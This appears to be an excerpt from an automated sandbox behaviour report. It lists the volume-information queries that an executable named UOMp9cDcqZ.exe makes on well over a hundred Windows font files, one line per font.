Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation			Jump to behavior
